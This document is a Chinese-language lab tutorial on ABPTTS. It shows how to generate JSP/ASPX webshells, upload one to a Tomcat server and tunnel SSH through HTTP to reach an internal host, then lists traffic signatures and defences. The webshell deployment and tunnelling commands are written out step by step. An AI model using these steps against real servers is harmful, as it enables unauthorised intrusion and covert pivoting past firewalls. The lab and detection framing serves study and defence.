ABPTTS隧道搭建及流量分析技术文档

一、环境准备

1.1 实验环境

• 攻击机: Kali Linux (192.168.125.129)
• 靶机:
  • 内网CentOS7 Tomcat服务器 (192.168.125.134)
  • 内网Kali Linux (192.168.125.135)

1.2 依赖安装

在攻击机上安装Python2模块：

# 验证pip版本
pip --version

# 如果显示为pip2则继续安装，否则先安装pip2
pip install pycrypto
pip install httplib2

二、ABPTTS工具获取与配置

2.1 获取ABPTTS

git clone https://github.com/nccgroup/ABPTTS.git
cd ABPTTS

2.2 生成Webshell

python abpttsfactory.py -o webshell

执行后会在当前目录下生成webshell文件夹，包含jsp和aspx格式的webshell文件。

三、Webshell部署

3.1 上传Webshell

将生成的webshell文件(如abptts.jsp)上传到目标Web服务器：

scp webshell/abptts.jsp user@192.168.125.134:/path/to/webroot/

3.2 验证Webshell

浏览器访问：

http://192.168.125.134:8081/abptts.jsp

页面显示"ABPTTS"表示部署成功。

四、隧道建立与使用

4.1 建立SSH隧道

python abpttsclient.py -c webshell/config.txt -u http://192.168.125.134:8081/abptts.jsp -f 127.0.0.1:1234/127.0.0.1:22

此命令将目标机的22端口映射到攻击机的1234端口。

4.2 连接隧道

ssh -p 1234 127.0.0.1

这将通过HTTP隧道连接到目标机的SSH服务。

五、流量特征分析

5.1 协议特征

• 隧道基于HTTP协议传输
• 流量表现为常规HTTP请求/响应

5.2 检测特征

1. 请求特征:

   • 固定的URI路径(如/abptts.jsp)
   • POST请求体包含加密数据
   • 请求头可能包含特定字段

2. 响应特征:

   • 固定长度的响应体
   • 加密数据格式
   • 特定HTTP状态码

六、防御建议

1. Webshell检测:

   • 定期扫描Web目录中的可疑文件
   • 监控异常JSP/ASPX文件上传

2. 流量监控:

   • 检测异常的HTTP隧道流量
   • 分析固定模式的HTTP请求

3. 网络隔离:

   • 限制内网机器的出站连接
   • 实施严格的网络访问控制

七、总结

ABPTTS是一种基于HTTP协议的隧道工具，具有以下特点：

• 利用Web服务器作为跳板
• 流量伪装成正常HTTP通信
• 支持多种Web语言(JSP/ASPX)
• 可用于绕过防火墙限制

防御方应重点关注Web应用安全和异常流量检测，及时发现此类隐蔽隧道。